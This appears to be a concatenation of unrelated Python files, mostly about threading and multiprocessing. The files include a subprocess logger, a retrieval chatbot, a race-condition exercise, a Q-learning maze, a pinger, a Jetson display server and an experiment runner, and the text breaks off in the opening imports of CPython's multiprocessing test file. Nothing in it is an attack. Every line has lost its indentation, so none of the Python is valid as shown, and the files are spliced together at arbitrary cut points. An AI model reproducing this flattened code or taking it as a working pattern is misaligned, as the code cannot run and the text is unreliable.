# circle.finalize(cleanup=True)
comm.Barrier()
if comm.rank == 0:
try:
os.rmdir(G.tempdir)
except:
pass
# TODO: a close file error can happen when circle.finalize()
#
#if isinstance(circle.workq, DbStore):
# circle.workq.cleanup()
if __name__ == "__main__":
main()
|
subprocess_.py
|
import subprocess
import os
import sys
import traceback
import glob
from os.path import join
from multiprocessing import Pool, Value
import multiprocessing
import time
from termcolor import cprint
from threading import Thread
from queue import Queue, Empty
from msbase.logging import logger
def timed(func):
def function_wrapper(*args, **kwargs):
now = time.time()
ret = func(*args, **kwargs)
logger.info("%s(%s, %s) spent %.2fs" %
(func.__qualname__, args, kwargs, time.time() - now))
return ret
return function_wrapper
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def call_std(args, cwd=None, env={}, output=True, timeout_s=None):
if output:
p = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=1,
close_fds=ON_POSIX, cwd=cwd, env=dict(os.environ, **env))
start_time = time.time()
stdout = ""
q_stdout = Queue()
t_stdout = Thread(target=enqueue_output, args=(p.stdout, q_stdout))
t_stdout.daemon = True
t_stdout.start()
stderr = ""
q_stderr = Queue()
t_stderr = Thread(target=enqueue_output, args=(p.stderr, q_stderr))
t_stderr.daemon = True
t_stderr.start()
while True:
return_code = p.poll()
if return_code is not None:
break
try:
stdout_line = str(q_stdout.get_nowait(), "utf-8")
except Empty:
stdout_line = ''
try:
stderr_line = str(q_stderr.get_nowait(), "utf-8")
except Empty:
stderr_line = ''
if stdout_line:
stdout += stdout_line
logger.info(stdout_line.rstrip())
if stderr_line:
stderr += stderr_line
logger.warning(stderr_line.rstrip())
if timeout_s is not None and time.time() - start_time > timeout_s:
p.kill()
return (-1, "", "TIMEOUT!")
while True:
try:
stdout_line = str(q_stdout.get(timeout=.1), "utf-8")
except Empty:
break
stdout += stdout_line
logger.info(stdout_line.rstrip())
if timeout_s is not None and time.time() - start_time > timeout_s:
p.kill()
return (-1, "", "TIMEOUT!")
while True:
try:
stderr_line = str(q_stderr.get(timeout=.1), "utf-8")
except Empty:
break
stderr += stderr_line
logger.warning(stderr_line.rstrip())
if timeout_s is not None and time.time() - start_time > timeout_s:
p.kill()
return (-1, "", "TIMEOUT!")
return (return_code, stdout, stderr)
else:
code = subprocess.call(args, cwd=cwd, env=dict(os.environ, **env), timeout=timeout_s)
return (code, None, None)
@timed
def try_call_std(args, cwd=None, env={}, verbose=True,
output=True, noexception=False, timeout_s=None):
'''An asynchronously logged process executor
that returns essential information all you need
'''
if verbose:
cprint("+ " + " ".join(args), "blue")
code, stdout, stderr = call_std(args, cwd, env, output, timeout_s=timeout_s)
if not noexception and code != 0:
if verbose:
print("STDOUT: ")
print(stdout)
print("STDERR: ")
cprint(stderr, "red")
raise Exception(str(code) + ": calling " + " ".join(args) + " failed")
else:
return stdout, stderr, code
def multiprocess(task, inputs, n: int, verbose=True, return_dict=True, throws=False, debug_mode=False):
'''How to use this effectively:
1. Use debug_mode=True to switch to tracked for-loop
'''
if debug_mode:
results = []
for arg in inputs:
start_time = time.time()
logger.info("Working on %s" % arg)
results.append(task(arg))
logger.info("Time spent: %.2f" % (time.time() - start_time))
return results
counter = Value('i', 0)
total = float(len(inputs))
start_time = time.time()
global run
def run(input):
with counter.get_lock():
if verbose:
logger.info("%fs - progress: %f" % (time.time() - start_time, counter.value / total))
counter.value += 1
try:
return (True, task(input))
except Exception as e:
return (False, "%s\n%s" % (e, traceback.format_exc()))
with Pool(n) as p:
results = p.map(run, inputs)
if verbose:
logger.info("total spent time: %f" % (time.time() - start_time))
if throws:
ret = []
for ok, r in results:
if not ok:
raise Exception(str(r))
ret.append(r)
return ret
if return_dict:
return dict(zip(inputs, results))
else:
return results
|
control.py
|
# -*- coding: utf-8 -*-
from random import choice
import pickle
import threading
import time
import jieba
from gensim.models.doc2vec import Doc2Vec, LabeledSentence
from sklearn.externals import joblib
import numpy as np
from bert_serving.client import BertClient
from retrieval_documents import Retrieval
from fuzzy_match import fuzzy_matching
from tf_idf import TfIdf
from config import config, frequency_domain
NUM_OF_IR = 20
class Agent:
good_qualified_corpus = set()
def __init__(self):
self.config = config
self.stop_words = ''
self.punctuation_str = ''.join(self.config.punctuation_ls)
self.frequency_domain_dict = frequency_domain.frequency_dict
self.cluster_md = self.config.cluster_model
# self.vec_md = self.config.doc_vector_model
self.init_all_states()
self.fuzzy_weight = 0.2
self.tf_idf_weight = 0.8
self.good_corpus_threshold = 200
self.good_corpus_score = 0.95
def init_all_states(self):
self.retrieval = Retrieval(num_ir=NUM_OF_IR, config=self.config)
self.tf_idf = TfIdf(self.config)
self.cluster_model = joblib.load(self.cluster_md)
# self.vec_model = Doc2Vec.load(self.vec_md)
# self.vec_model = BertClient()
self.load_stop_words(self.config)
jieba.initialize()
def get_utterance_type(self, utterance):
# tmp_vector = self.vec_model.infer_vector(utterance)
# tmp_vector = self.vec_model.encode([utterance])
# label = self.cluster_model.predict(tmp_vector)
# print(label)
# return self.config.cluster_file[label[0]]
return self.config.cluster_file[0]
def record_good_conversations(self, utterance, score_ls, context_ls):
def write_conversations():
localtime = (time.asctime(time.localtime(time.time()))).replace(' ', '_').replace(':', '-')
with open(self.config.path_of_good_conversation+localtime, 'wb') as wfp:
pickle.dump(Agent.good_qualified_corpus, wfp)
Agent.good_qualified_corpus.clear()
# print(Agent.good_qualified_corpus)
for index in range(len(score_ls)):
if score_ls[index] > self.good_corpus_score:
if context_ls[index][0] and context_ls[index][1]:
# print((utterance, context_ls[index][1]))
Agent.good_qualified_corpus.add((utterance, context_ls[index][1]))
# print(len(Agent.good_qualified_corpus))
if len(Agent.good_qualified_corpus) > self.good_corpus_threshold:
record_thread = threading.Thread(target=write_conversations)
record_thread.start()
def random_chose_index(self, score_ls, max_score):
max_score_indexes = []
for i in range(len(score_ls)):
if score_ls[i] == max_score:
max_score_indexes.append(i)
return choice(max_score_indexes)
def load_stop_words(self, config):
with open(config.stop_words, 'rb') as fpr:
self.stop_words = pickle.load(fpr)
def remove_special_words(self, stop_words_ls, input_sentence):
sentence = input_sentence
for special_word in self.config.special_modal_words:
if special_word in sentence:
sentence = sentence.replace(special_word, '')
return sentence
def response_answer(self, reply_msg, max_score):
if type(max_score) is np.ndarray:
final_max_score = max_score[0][0]
else:
final_max_score = max_score
return reply_msg, final_max_score
def get_answer(self, utterance, file_name=None):
try:
utterance = utterance.rstrip(self.punctuation_str)
file_name = self.get_utterance_type(utterance)
self.retrieval.read_indexes(file_name)
context_ls = self.retrieval.search_sentences(utterance, self.stop_words)
if not context_ls:
return "", 0
utterance_no_stop = self.remove_special_words(self.stop_words, utterance)
new_context_ls = []
for each_context in context_ls:
ques = self.remove_special_words(self.stop_words, each_context[0])
ans = self.remove_special_words(self.stop_words, each_context[1])
if not ques or not ans:
new_context_ls.append((0, 0))
continue
new_context_ls.append((ques, ans))
# print("control!!!!!!!!!!!!!!!!!: {},{}".format(utterance, new_context_ls))
# print(len(new_context_ls))
fuzzy_ratio_ls = fuzzy_matching(utterance_no_stop, new_context_ls)
self.tf_idf.select_model(file_name)
self.tf_idf.predict_tfidf(utterance_no_stop, new_context_ls)
tf_idf_score_ls = self.tf_idf.calculate_distances()
if fuzzy_ratio_ls.count(max(fuzzy_ratio_ls)) > 1:
fuzzy_best_index = self.random_chose_index(fuzzy_ratio_ls, max(fuzzy_ratio_ls))
else:
fuzzy_best_index = fuzzy_ratio_ls.index(max(fuzzy_ratio_ls))
if tf_idf_score_ls.count(max(tf_idf_score_ls)) > 1:
tftdf_best_index = self.random_chose_index(tf_idf_score_ls, max(tf_idf_score_ls))
else:
tftdf_best_index = tf_idf_score_ls.index(max(tf_idf_score_ls))
fuzzy_best_content = context_ls[fuzzy_best_index][0].rstrip(self.punctuation_str)
tfidf_best_content = context_ls[tftdf_best_index][0].rstrip(self.punctuation_str)
if fuzzy_best_content == utterance or utterance.strip(''.join(config.special_modal_words)) in fuzzy_best_content:
best_index = fuzzy_best_index
# return context_ls[best_index][1], max(fuzzy_ratio_ls)
return self.response_answer(context_ls[best_index][1], max(fuzzy_ratio_ls))
if tfidf_best_content == utterance or utterance.strip(''.join(config.special_modal_words)) in tfidf_best_content:
best_index = tftdf_best_index
# return context_ls[best_index][1], max(tf_idf_score_ls)
return self.response_answer(context_ls[best_index][1], max(tf_idf_score_ls))
final_score_ls = [(fuzzy_ratio * self.fuzzy_weight + tf_tdf_score * self.tf_idf_weight) for fuzzy_ratio, tf_tdf_score in
zip(fuzzy_ratio_ls, tf_idf_score_ls)]
# TODO: find a suitable weight
self.record_good_conversations(utterance, final_score_ls, context_ls)
max_score = max(final_score_ls)
if final_score_ls.count(max_score) > 1:
best_index = self.random_chose_index(final_score_ls, max_score)
else:
best_index = final_score_ls.index(max_score)
# print("final result:{}".format(context_ls[best_index]))
# print(type(max_score))
return self.response_answer(context_ls[best_index][1], max_score)
except Exception as e:
return "", 0
def test(self, utterance):
answer = self.get_answer(utterance)
return answer
def start_cmd(self):
while True:
utterance = input(">>>")
if utterance.strip() == "exit1":
break
answer, score = self.get_answer(utterance)
print("<<<{}:{}".format(answer, score))
def api(self, utterance):
answer, score = self.get_answer(utterance)
return [answer, score]
def socket_get(self, utterance):
answer, score = self.get_answer(utterance)
# print(answer + '---' + str(score[0][0]))
return answer + '---' + str(score)
if __name__ == '__main__':
agent = Agent()
agent.start_cmd()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
for t in range (0,10000000):
i=i+1
# TODO: increment i 1_000_000 times
def decrementingFunction():
global i
for t in range (0,10000000):
i=i-1
# TODO: decrement i 1_000_000 times
def main():
# TODO: Something is missing here (needed to print i)
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
maze_escaping.py
|
# -*- coding: utf-8 -*-
import maze
import threading
import time
discount = 0.3
actions = maze.actions
states = []
Q = {}
for i in range(maze.x):
for j in range(maze.y):
states.append((i, j))
for state in states:
temp = {}
for action in actions:
temp[action] = 0.1
maze.set_cell_score(state, action, temp[action])
Q[state] = temp
for (i, j, c, w) in maze.specials:
for action in actions:
Q[(i, j)][action] = w
maze.set_cell_score((i, j), action, w)
def do_action(action):
s = maze.player
r = -maze.score
if action == actions[0]:
maze.try_move(0, -1)
elif action == actions[1]:
maze.try_move(0, 1)
elif action == actions[2]:
maze.try_move(-1, 0)
elif action == actions[3]:
maze.try_move(1, 0)
else:
return
s2 = maze.player
r += maze.score
return s, action, r, s2
def max_Q(s):
val = None
act = None
for a, q in Q[s].items():
if val is None or (q > val):
val = q
act = a
return act, val
def inc_Q(s, a, alpha, inc):
Q[s][a] *= 1 - alpha
Q[s][a] += alpha * inc
maze.set_cell_score(s, a, Q[s][a])
def run():
global discount
time.sleep(10)
alpha = 1
t = 1
while True:
# Pick the right action
s = maze.player
max_act, max_val = max_Q(s)
(s, a, r, s2) = do_action(max_act)
# Update Q
max_act, max_val = max_Q(s2)
inc_Q(s, a, alpha, r + discount * max_val)
# Check if the game has restarted
t += 1.0
if maze.has_restarted():
maze.restart_game()
time.sleep(0.01)
t = 1.0
# Update the learning rate
alpha = pow(t, -0.1)
# MODIFY THIS SLEEP IF THE GAME IS GOING TOO FAST.
time.sleep(0.1)
t = threading.Thread(target=run)
t.daemon = True
t.start()
maze.start_game()
|
ping.py
|
#!/usr/bin/env python3
import subprocess
import sys
import threading
import obozrenie.helpers as helpers
def add_rtt_info(array):
"""Appends server response time to the table."""
hosts_array = []
rtt_array = []
rtt_array.append([])
for entry in array:
host = entry['host'].split(":")
if len(host) > 1:
host = ":".join(host[0:-1])
else:
host = ":".join(host)
hosts_array.append(host)
pinger = Pinger()
pinger.hosts = list(set(hosts_array))
pinger.action = "ping"
pinger.status.clear()
rtt_array = pinger.start()
# Match ping in host list.
for entry in array:
host = entry['host'].split(":")
if len(host) > 1:
host = ":".join(host[0:-1])
else:
host = ":".join(host)
entry["ping"] = rtt_array[host]
class Pinger():
status = {} # Populated while we are running
hosts = [] # List of all hosts/ips in our input queue
action = "ping"
options = []
# How many ping process at the time.
thread_count = 100
# Lock object to keep track the threads in loops, where it can potentially be race conditions.
lock = threading.Lock()
def ping(self, entry):
"""Pings the requested server. Note: this function is not threaded yet, therefore pinging may take up to a second."""
if sys.platform == 'win32':
ping_cmd = ["ping", '-n', '1', entry]
else:
ping_cmd = ["ping", '-c', '1', '-n', '-W', '1', entry]
ping_output_byte, _ = subprocess.Popen(ping_cmd, stdout=subprocess.PIPE).communicate()
ping_output = ping_output_byte.decode()
try:
if sys.platform == 'win32':
rtt_info = ping_output.rstrip('\n').split('\n')[-1].split(',')[0].split('=')[-1].strip('ms')
else:
rtt_info = ping_output.split('\n')[1].split('=')[-1].split(' ')[0]
rtt_num = round(float(rtt_info))
except:
rtt_num = 9999
return rtt_num
def pop_queue(self):
entry = None
self.lock.acquire() # Grab or wait+grab the lock.
if self.hosts:
entry = self.hosts.pop()
self.lock.release() # Release the lock, so another thread could grab it.
return entry
def dequeue(self):
while True:
entry = self.pop_queue()
if not entry:
return None
if self.action == "ping":
result = self.ping(entry)
else:
result = None
self.status[entry] = result
def start(self):
threads = []
for i in range(self.thread_count):
# Create self.thread_count number of threads that together will
# cooperate removing every ip in the list. Each thread will do the
# job as fast as it can.
t = threading.Thread(target=self.dequeue)
t.start()
threads.append(t)
# Wait until all the threads are done. .join() is blocking.
[t.join() for t in threads]
return self.status
|
test_concurrency.py
|
from threading import Thread
from nose.tools import ok_
from pyvirtualdisplay.display import Display
def test_with():
ls = [0, 0]
def f1():
ls[0] = Display()
# d1.start()
def f2():
ls[1] = Display()
# d2.start()
t1 = Thread(target=f1)
t2 = Thread(target=f2)
t1.start()
t2.start()
t1.join()
t2.join()
# print ls
dv1 = ls[0].new_display_var
dv2 = ls[1].new_display_var
# print dv1
# print dv2
ok_(dv1 != dv2)
# ok_(0)
|
join.py
|
from Table import Table
import numpy as np
from schemas import *
import threading
def recup_index_lig(tab, Nom):
for index, element in enumerate(tab.col_names):
if element == Nom:
# print (index)
return index
def recup_index_col(tab, lig, test):
liste = []
if (tab.storage == 'row'):
for i in range(tab.data.shape[0]):
if (tab.data[i][lig] == test):
liste.append(i)
else:
for i in range(len(tab.data[lig][:])):
if (tab.data[lig][i] == test):
liste.append(i)
# print(liste)
return liste
def join_multithread(tab1, key1, tab2, key2, num_threads):
test_scheme = {**tab1.schema, **tab2.schema}
del test_scheme[key2]
n_rows = max(tab1.n_rows, tab2.n_rows)
indexlig = recup_index_lig(tab1, key1)
indexlig2 = recup_index_lig(tab2, key2)
joint = Table(test_scheme, n_rows, tab1.name + " " + tab2.name, tab1.storage)
if tab1.storage == "row":
test = list(set(tab1.data[:, indexlig]))
joint.data=np.empty((0,tab1.n_cols+tab2.n_cols-1))
else:
test = list(set(tab1.data[indexlig][:]))
joint.data=[]
for i in range(tab1.n_cols+tab2.n_cols-1):
joint.data.append([])
threads_list = np.empty(num_threads, dtype=object)
threads_t = np.array_split(np.array(test), num_threads)
idx = np.array_split(np.array(range(0,n_rows)), num_threads)
def single_thread_join(tt,a):
tab = []
if (tab1.storage == 'row'):
temp= []
res1=[]
res2 = []
for t,key in enumerate(tt):
index = recup_index_col(tab1, indexlig, key)
index2 = recup_index_col(tab2, indexlig2, key)
for i in range(len(index)):
for j in range(len(index2)):
temp = []
res1=[]
res2 = []
# temp.append(key)
for k in range(tab1.n_cols):
res1.append(tab1.data[index[i], k])
for k2 in range(tab2.n_cols):
if (k2 != indexlig2):
res2.append(tab2.data[index2[j], k2])
if res1!=[] and res2!=[]:
temp=res1+res2
joint.data = np.append(joint.data, [np.array(temp, dtype=object)],axis=0)
else:
for key in tt:
temp= []
res1=[]
res2 = []
index = recup_index_col(tab1, indexlig, key)
index2 = recup_index_col(tab2, indexlig2, key)
for i in range(len(index)):
for j in range(len(index2)):
temp = []
res1=[]
res2 = []
# temp.append(key)
for k in range(tab1.n_cols):
res1.append(tab1.data[k][index[i]])
for k2 in range(tab2.n_cols):
if (k2 != indexlig2):
res2.append(tab2.data[k2][index2[j]])
if res1!=[] and res2!=[]:
temp=res1+res2
for w,val in enumerate(temp):
joint.data[w].append(val)
for i in range(num_threads):
threads_list[i] = threading.Thread(target=single_thread_join, args=(threads_t[i], 1))
# Starting Threads
for t in threads_list:
t.start()
# Waiting for all threads to finish
for t in threads_list:
t.join()
return joint
def join(tab1, key1, tab2, key2):
test_scheme = {**tab1.schema, **tab2.schema}
del test_scheme[key2]
tab = []
indexlig = recup_index_lig(tab1, key1)
indexlig2 = recup_index_lig(tab2, key2)
if (tab1.storage == 'row'):
test = list(set(tab1.data[:, indexlig]))
for key in test:
index = recup_index_col(tab1, indexlig, key)
index2 = recup_index_col(tab2, indexlig2, key)
for i in range(len(index)):
for j in range(len(index2)):
temp = []
# temp.append(key)
for k in range(tab1.n_cols):
temp.append(tab1.data[index[i], k])
for k2 in range(tab2.n_cols):
if (k2 != indexlig2):
temp.append(tab2.data[index2[j], k2])
tab.append(temp)
tab = np.array(tab)
joint = Table(test_scheme, tab.shape[0], tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(tab)
else:
test = list(set(tab1.data[indexlig][:]))
for key in test:
index = recup_index_col(tab1, indexlig, key)
index2 = recup_index_col(tab2, indexlig2, key)
for i in range(len(index)):
for j in range(len(index2)):
temp = []
# temp.append(key)
for k in range(tab1.n_cols):
temp.append(tab1.data[k][index[i]])
for k2 in range(tab2.n_cols):
if (k2 != indexlig2):
temp.append(tab2.data[k2][index2[j]])
tab.append(temp)
joint = Table(test_scheme, len(tab), tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(tab)
return joint
def hash_join(tab1, key1, tab2, key2):
test_scheme = {**tab1.schema, **tab2.schema}
del test_scheme[key2]
tab = []
temp = []
indexlig2 = recup_index_lig(tab2, key2)
dico = {}
if (tab1.storage == 'row'):
for i,val in enumerate (tab1.data[:,:]): #creation du dico avec l'index comme clé qui est la mm que key1
dico[i]=val
for i in range (len(tab2.data[:,indexlig2])): #parcours le 2 eme tableau
if tab2.data[i,indexlig2] in dico : #si la clé correspond a une cle du dico
temp = list(dico[tab2.data[i,indexlig2]])+list(tab2.data[i,:]) #on entre les val des 2 tables dans la liste
del temp[tab1.n_cols+indexlig2]
tab.append(temp)
joint = Table(test_scheme, np.array(tab).shape[0], tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(np.array(tab))
else :
T1 = np.array(tab1.data).T
T2 = np.array(tab2.data).T
for i,val in enumerate (T1):
dico[i]=val
for i in range (len(T2[:,indexlig2])):
if (int(T2[i,indexlig2]) in dico):
temp = list(dico[int(T2[i,indexlig2])])+list(T2[i,:])
del temp[tab1.n_cols+indexlig2]
tab.append(temp)
joint = Table(test_scheme, len(tab), tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(tab)
"""
else :
T1 = np.array(tab1.data)
T2 = np.array(tab2.data)
for i in range (len(tab1.data[indexlig][:])):
dico[i]= T1[:,i]
for i in range (len(tab2.data[indexlig2][:])):
if (tab2.data[indexlig2][i] in dico):
temp = list(dico[tab2.data[indexlig2][i]])+list(T2[:,i])
del temp[tab1.n_cols+indexlig2]
#temp = np.c_[dico[tab2.data[i,indexlig2]].reshape((a,1)).T,tab2.data[i,:].reshape((b,1)).T]
tab.append(temp)
joint = Table(test_scheme, len(tab), tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(tab)
"""
return joint
|
display_server.py
|
import threading
import Adafruit_SSD1306
import time
import PIL.Image
import PIL.ImageFont
import PIL.ImageDraw
from flask import Flask
from .utils import ip_address, power_mode, power_usage, cpu_usage, gpu_usage, memory_usage, disk_usage
from jetcard import ads1115
from jetcard import ina219
import os
class DisplayServer(object):
def __init__(self, *args, **kwargs):
i2c_bus = 1
adress = os.popen("i2cdetect -y -r 1 0x48 0x48 | egrep '48' | awk '{print $2}'").read()
adress8 = os.popen("i2cdetect -y -r 8 0x48 0x48 | egrep '48' | awk '{print $2}'").read()
if(adress=='48\n'):
self.ads = ads1115.ADS1115()
elif (adress8 =='48\n'):
self.ads = ads1115.ADS1115(i2c_bus=8)
i2c_bus = 8
else:
self.ads = None
adress = os.popen("i2cdetect -y -r 1 0x41 0x41 | egrep '41' | awk '{print $2}'").read()
adress8 = os.popen("i2cdetect -y -r 8 0x41 0x41 | egrep '41' | awk '{print $2}'").read()
if(adress=='41\n'):
self.ina219 = ina219.INA219(addr=0x41)
if(adress8=='41\n'):
self.ina219 = ina219.INA219(addr=0x41, i2c_bus=8)
i2c_bus = 8
else:
self.ina219 = None
adress = os.popen("i2cdetect -y -r 1 0x42 0x42 | egrep '42' | awk '{print $2}'").read()
adress8 = os.popen("i2cdetect -y -r 8 0x42 0x42 | egrep '42' | awk '{print $2}'").read()
if(adress=='42\n'):
self.ina = ina219.INA219(addr=0x42)
if(adress8=='42\n'):
self.ina = ina219.INA219(addr=0x42, i2c_bus=8)
i2c_bus = 8
else:
self.ina = None
print("I2C-BUS:", i2c_bus)
self.display = Adafruit_SSD1306.SSD1306_128_32(rst=None, i2c_bus=i2c_bus, gpio=1)
self.display.begin()
self.display.clear()
self.display.display()
self.font = PIL.ImageFont.load_default()
self.image = PIL.Image.new('1', (self.display.width, self.display.height))
self.draw = PIL.ImageDraw.Draw(self.image)
self.draw.rectangle((0, 0, self.image.width, self.image.height), outline=0, fill=0)
self.stats_enabled = False
self.stats_thread = None
self.stats_interval = 1.0
self.enable_stats()
def _run_display_stats(self):
Charge = False
while self.stats_enabled:
self.draw.rectangle((0, 0, self.image.width, self.image.height), outline=0, fill=0)
# set IP address
top = -2
if ip_address('eth0') is not None:
self.draw.text((4, top), 'IP: ' + str(ip_address('eth0')), font=self.font, fill=255)
elif ip_address('wlan0') is not None:
self.draw.text((4, top), 'IP: ' + str(ip_address('wlan0')), font=self.font, fill=255)
else:
self.draw.text((4, top), 'IP: not available')
top = 6
power_mode_str = power_mode()
if(self.ina != None):
bus_voltage = self.ina.getBusVoltage_V() # voltage on V- (load side)
current = self.ina.getCurrent_mA() # current in mA
p = (bus_voltage - 6)/2.4*100
if(p > 100):p = 100
if(p < 0):p = 0
if(current < 0):current = 0
if(current > 30):
Charge = not Charge
else:
Charge = False
if(Charge == False):
self.draw.text((600, -2), ' ', font=self.font, fill=255)
else:
self.draw.text((120, -2), '*', font=self.font, fill=255)
self.draw.text((4, top), power_mode_str + (" %.1fV")%bus_voltage + (" %.2fA")%(current/1000) + (" %2.0f%%")%p, font=self.font, fill=255)
elif(self.ina219 != None):
bus_voltage = self.ina219.getBusVoltage_V() # voltage on V- (load side)
current = self.ina219.getCurrent_mA() # current in mA
p = (bus_voltage - 9)/3.6*100
if(p > 100):p = 100
if(p < 0):p = 0
if(current < 0):current = 0
if(current > 30):
Charge = not Charge
else:
Charge = False
if(Charge == False):
self.draw.text((600, -2), ' ', font=self.font, fill=255)
else:
self.draw.text((120, -2), '*', font=self.font, fill=255)
self.draw.text((4, top), power_mode_str + (" %.1fV")%bus_voltage + (" %.2fA")%(current/1000) + (" %2.0f%%")%p, font=self.font, fill=255)
elif(self.ads != None):
value=self.ads.readVoltage(4)/1000.0
p = (value - 9)/3.6*100
if(p > 100):p = 100
if(p < 0):p = 0
self.draw.text((4, top), 'MODE: ' + power_mode_str + (" %.1fV")%value + (" %2.0f%%")%p, font=self.font, fill=255)
else:
self.draw.text((4, top), 'MODE: ' + power_mode_str, font=self.font, fill=255)
# set stats headers
top = 14
offset = 3 * 8
headers = ['PWR', 'CPU', 'GPU', 'RAM', 'DSK']
for i, header in enumerate(headers):
self.draw.text((i * offset + 4, top), header, font=self.font, fill=255)
# set stats fields
top = 22
power_watts = '%.1f' % power_usage()
gpu_percent = '%02d%%' % int(round(gpu_usage() * 100.0, 1))
cpu_percent = '%02d%%' % int(round(cpu_usage() * 100.0, 1))
ram_percent = '%02d%%' % int(round(memory_usage() * 100.0, 1))
disk_percent = '%02d%%' % int(round(disk_usage() * 100.0, 1))
entries = [power_watts, cpu_percent, gpu_percent, ram_percent, disk_percent]
for i, entry in enumerate(entries):
self.draw.text((i * offset + 4, top), entry, font=self.font, fill=255)
self.display.image(self.image)
self.display.display()
time.sleep(self.stats_interval)
def enable_stats(self):
# start stats display thread
if not self.stats_enabled:
self.stats_enabled = True
self.stats_thread = threading.Thread(target=self._run_display_stats)
self.stats_thread.start()
def disable_stats(self):
self.stats_enabled = False
if self.stats_thread is not None:
self.stats_thread.join()
self.draw.rectangle((0, 0, self.image.width, self.image.height), outline=0, fill=0)
self.display.image(self.image)
self.display.display()
def set_text(self, text):
self.disable_stats()
self.draw.rectangle((0, 0, self.image.width, self.image.height), outline=0, fill=0)
print(text)
lines = text.split('\n')
top = 2
for line in lines:
self.draw.text((4, top), line, font=self.font, fill=255)
top += 10
self.display.image(self.image)
self.display.display()
server = DisplayServer()
app = Flask(__name__)
@app.route('/stats/on')
def enable_stats():
global server
server.enable_stats()
return "stats enabled"
@app.route('/stats/off')
def disable_stats():
global server
server.disable_stats()
return "stats disabled"
@app.route('/text/<text>')
def set_text(text):
global server
server.set_text(text)
return 'set text: \n\n%s' % text
if __name__ == '__main__':
app.run(host='0.0.0.0', port='8000', debug=False)
|
run_k_core.py
|
import socket
from exec_utilities import time_out_util
from config import *
from exec_utilities.exec_utils import *
from multiprocessing import Process
def run_exp(env_tag=knl_tag, with_c_group=True, data_path_tag=k_truss_exec_path_tag):
hostname = socket.gethostname()
with open('config.json') as ifs:
my_config_dict = json.load(ifs)[env_tag]
our_exec_path = my_config_dict[data_path_tag]
data_set_path = my_config_dict[data_set_path_tag]
thread_num_lst = [40]
data_set_lst = my_config_dict[data_set_lst_tag]
exp_res_root_name = 'exp_results'
folder_name = 'exp-2019-12-13-pkc' + os.sep + hostname
our_exec_name_lst = ['test_pkc_imporved', 'test_pkc_legacy']
work_dir = os.sep.join(['.', exp_res_root_name, folder_name])
os.system('mkdir -p ' + work_dir)
logger = get_logger(os.sep.join([work_dir, hostname + '.log']), name=__name__)
logger.info(my_splitter + time.ctime() + my_splitter)
logger.info('res folder: {}'.format(folder_name))
logger.info('our exec folder: {}'.format(our_exec_path))
logger.info('our exec name list: {}'.format(our_exec_name_lst))
logger.info('thread# lst: {}'.format(thread_num_lst))
logger.info('data set lst: {}'.format(data_set_lst))
def one_round():
for data_set_name in data_set_lst:
for our_algorithm in our_exec_name_lst:
for t_num in thread_num_lst:
statistics_dir = os.sep.join(map(str, ['.', exp_res_root_name, folder_name, data_set_name, t_num]))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'log']))
statistics_file_path = statistics_dir + os.sep + our_algorithm + '.log'
dstat_file_path = statistics_dir + os.sep + our_algorithm + '-dstat.log'
log_file_path = os.sep.join(
[statistics_dir, 'log', '-'.join([our_algorithm, 'raw.log'])])
logger.info('stat file path: {}'.format(statistics_file_path))
logger.info('log file path: {}'.format(log_file_path))
# 1st: append headers
append_header(statistics_file_path)
append_header(dstat_file_path)
append_header(log_file_path)
# 2nd: run exec cmd
algorithm_path = our_exec_path + os.sep + our_algorithm
params_lst = map(str, ['cgexec -g memory:yche-exp' if with_c_group else '', algorithm_path,
data_set_path + os.sep + data_set_name, statistics_file_path])
cmd = ' '.join(params_lst)
logger.info('exec-cmd: {}'.format(cmd))
time_out = 3600 * 5
my_env = os.environ.copy()
def execute_cmd(my_cmd):
logger.info('sub-process: {}'.format(my_cmd))
os.system(my_cmd)
# 3rd: spawn a new process to run the exec
dstat_cmd = 'dstat -tcdrlmgyn --fs >> ' + dstat_file_path
p = Process(target=execute_cmd, args=(dstat_cmd,))
p.start()
my_env['OMP_NUM_THREADS'] = str(t_num)
tle_flag, info, correct_info = time_out_util.run_with_timeout(cmd, timeout_sec=time_out,
env=my_env)
time_out_util.kill_term_recursive(p.pid)
modify_dstat_file(dstat_file_path)
# 4th: append outputs
write_split(statistics_file_path)
with open(statistics_file_path, 'a+') as ifs:
ifs.write(correct_info)
ifs.write('\nis_time_out:' + str(tle_flag))
ifs.write(my_splitter + time.ctime() + my_splitter)
ifs.write('\n\n\n\n')
if len(info) > 0:
with open(log_file_path, 'a+') as ofs:
ofs.write(info)
logger.info('finish: {}'.format(cmd))
one_round()
if __name__ == '__main__':
hostname = socket.gethostname()
if hostname.startswith('ustgpu2'):
run_exp(env_tag=ustgpu2_tag, with_c_group=False)
elif hostname.startswith('ustgpu1'):
run_exp(env_tag=ustgpu1_tag, with_c_group=False)
elif hostname.startswith('lccpu12'):
run_exp(lccpu12_tag, False)
elif hostname.startswith('gpu23'):
run_exp(env_tag=gpu23_tag)
elif hostname.startswith('gpu'):
run_exp(env_tag=gpu_other_tag)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
